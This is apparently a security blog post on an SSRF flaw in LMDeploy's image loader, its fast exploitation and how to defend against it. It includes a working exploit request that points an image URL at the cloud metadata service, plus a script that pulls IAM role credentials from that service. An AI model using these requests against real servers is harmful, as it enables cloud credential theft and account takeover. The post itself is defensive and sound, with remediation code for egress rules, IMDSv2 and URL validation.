On April 23, 2026, the maintainers of LMDeploy — an open-source toolkit for compressing, deploying, and serving large language models — published a GitHub Security Advisory for CVE-2026-33626. The flaw, a Server-Side Request Forgery (SSRF) in the vision-language module's load_image() function, allows the model server to fetch arbitrary URLs without validating internal or private IP addresses. CVSS 7.5. Affected: every version with vision-language support up to and including 0.12.0.
12 hours and 31 minutes later, Sysdig's honeypot caught the first live exploitation attempt. Within 13 hours of publication, real attackers were running the exploit against real targets in the wild. By the time most security teams in Asia and Europe had finished their morning standup, the bug had already been weaponized.
Why this one matters more than a typical SSRF
Pure SSRF on a normal web server is annoying. SSRF on a vision-LLM inference node is potentially catastrophic. Three reasons.
First, where these things run. LMDeploy nodes typically sit on GPU instances at cloud providers. Those instances usually carry IAM roles broad enough to reach S3, KMS, and internal APIs, and every instance can reach the cloud's instance metadata service (IMDS). One successful IMDS fetch can hand an attacker temporary credentials that compromise the entire cloud account.
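To make "one successful IMDS fetch" concrete: where the legacy IMDSv1 is still enabled, credential theft is a two-request affair against AWS's documented metadata paths. The sketch below issues those requests directly; in the SSRF scenario, the attacker coaxes the model server into making them on its behalf.

    import json
    import urllib.request

    IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

    # Request 1: the bare path returns the name of the IAM role attached to the instance.
    role = urllib.request.urlopen(IMDS, timeout=2).read().decode().strip()

    # Request 2: appending the role name returns temporary credentials as JSON
    # (AccessKeyId, SecretAccessKey, Token, Expiration) -- enough to act as that
    # role from anywhere until the credentials expire.
    creds = json.loads(urllib.request.urlopen(IMDS + role, timeout=2).read())
    print(creds["AccessKeyId"], creds["Expiration"])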
Second, how the SSRF gets triggered. The attacker simply submits a vision-language inference request with a URL pointing at an internal target. The image loader dutifully fetches it. There is no exotic exploit chain. There is no memory corruption. It is the model server doing exactly what it was built to do — load an image — only the "image" happens to be http://169.254.169.254/latest/meta-data/iam/security-credentials/.
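What that looks like on the wire depends on the deployment; here is a minimal sketch, assuming an OpenAI-compatible chat endpoint exposed by the api_server. The hostname, port, and exact request shape are assumptions, not details from the advisory.

    import requests

    SERVER = "http://gpu-node.internal:23333"  # hypothetical host and port

    payload = {
        "model": "OpenGVLab/InternVL2-8B",
        "messages": [{
            "role": "user",
            "content": [
                {"type": "text", "text": "Describe this image."},
                # The "image" is not an image at all -- it's the cloud metadata service.
                {"type": "image_url", "image_url": {
                    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}},
            ],
        }],
    }
    r = requests.post(f"{SERVER}/v1/chat/completions", json=payload, timeout=30)
    print(r.status_code, r.text[:200])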
Third, the operational profile. Sysdig's telemetry from one observed eight-minute session shows the attacker using the SSRF as a generic HTTP probe to scan the internal network: AWS IMDS, Redis, MySQL, an internal admin HTTP service, and an out-of-band DNS exfiltration endpoint. Requests rotated between vision-language models like internlm-xcomposer2 and OpenGVLab/InternVL2-8B to evade simplistic detection. This was not a curious researcher. This was tooling.
What it tells us about the AI supply chain
CVE-2026-33626 is the first real-world public datapoint that the AI inference layer is now being treated like every other internet-facing service: scanned, fingerprinted, and exploited within hours of disclosure.
For most of 2024-2025, AI security conversations were dominated by prompt injection, jailbreaks, and training-data poisoning. Real attackers don't care about any of that yet. They care about the same thing they always care about: an unauthenticated HTTP fetcher that runs on a privileged host. LMDeploy gave them one. So have several other inference frameworks audited in the wake of this disclosure (Triton's Python backend, vLLM's batch endpoints, and Ollama versions prior to 0.6).
The grim implication is that the AI inference layer of 2026 looks a lot like the WordPress plugin ecosystem of 2014: shipping fast, mostly written by ML researchers rather than security engineers, with file fetchers and template engines that pre-date a serious threat model.
My take and an action list
The thing security teams should internalize from this incident is the 13-hour number. Not because that's unusually fast — it isn't, in 2026. The point is that the response window for AI infrastructure is the same as for web servers and edge proxies, and most organizations are not yet treating it that way. AI infrastructure is sitting in a separate Slack channel, behind a separate on-call rotation, with a separate (and less mature) patch cadence.
If you run inference servers in production, this week:
Audit every model-serving container's egress policy. Default-deny outbound. If an inference container needs internet, allow only the specific model registry it pulls from (a security-group sketch follows this list).
Strip IMDS access from GPU inference nodes. Enforce IMDSv2 with a hop limit of 1 at minimum (see the sketch after this list). Better yet, run inference under instance roles whose only permission is "read this one model bucket."
Move your AI inference servers under the same vulnerability-management SLA as your web tier. Same scanners, same on-call, same exploit-window targets.
Treat any image-loader, document-loader, or "fetch URL on behalf of the model" function as a security boundary. Validate the URL. Block private IP ranges. Block link-local addresses. Block your own VPC's CIDR (a validation sketch follows).
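On the egress point: one way to express "default-deny outbound, allow only the model registry" is at the security-group level. The sketch below uses boto3 against a hypothetical security group and managed prefix list; it illustrates the policy, it is not a drop-in script.

    import boto3

    ec2 = boto3.client("ec2")
    SG = "sg-0123456789abcdef0"           # hypothetical inference-node security group
    REGISTRY_PL = "pl-0exampleexample00"  # hypothetical prefix list for the model registry

    # Drop the default allow-all egress rule...
    ec2.revoke_security_group_egress(
        GroupId=SG,
        IpPermissions=[{"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}],
    )
    # ...then allow outbound HTTPS only toward the registry the node pulls models from.
    ec2.authorize_security_group_egress(
        GroupId=SG,
        IpPermissions=[{
            "IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
            "PrefixListIds": [{"PrefixListId": REGISTRY_PL, "Description": "model registry only"}],
        }],
    )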
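On the IMDS point: requiring IMDSv2 and capping the hop limit at 1 means a containerized process, one network hop away from the host, can no longer obtain a metadata token even if it can be coaxed into making the request. The instance ID below is a placeholder.

    import boto3

    ec2 = boto3.client("ec2")
    ec2.modify_instance_metadata_options(
        InstanceId="i-0123456789abcdef0",  # placeholder GPU inference node
        HttpTokens="required",             # IMDSv2 only: every metadata request needs a session token
        HttpPutResponseHopLimit=1,         # token responses expire after one hop, cutting off containers
    )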
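On the URL check itself: a reasonable gate resolves the hostname and rejects anything private, link-local, loopback, or inside your own VPC before the fetch ever happens; resolving first also blunts tricks where an innocent-looking hostname points at an internal address. The VPC CIDR below is a placeholder.

    import ipaddress
    import socket
    from urllib.parse import urlparse

    VPC_CIDR = ipaddress.ip_network("10.0.0.0/16")  # placeholder: your own VPC range

    def is_safe_image_url(url: str) -> bool:
        parsed = urlparse(url)
        if parsed.scheme not in ("http", "https") or not parsed.hostname:
            return False
        try:
            # Resolve the hostname ourselves and check every address it maps to,
            # so a DNS name can't smuggle in an internal IP.
            infos = socket.getaddrinfo(parsed.hostname, parsed.port or 443)
        except socket.gaierror:
            return False
        for info in infos:
            ip = ipaddress.ip_address(info[4][0])
            if (ip.is_private or ip.is_loopback or ip.is_link_local
                    or ip.is_reserved or ip.is_multicast or ip in VPC_CIDR):
                return False
        return True

Wire a check like this in front of whatever actually downloads the bytes, and log every rejection; those rejects are exactly the probing behavior Sysdig described.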
We crossed a threshold this week. AI inference is no longer a research-grade concern that lives off the side of the production network. It's production. Protect it accordingly.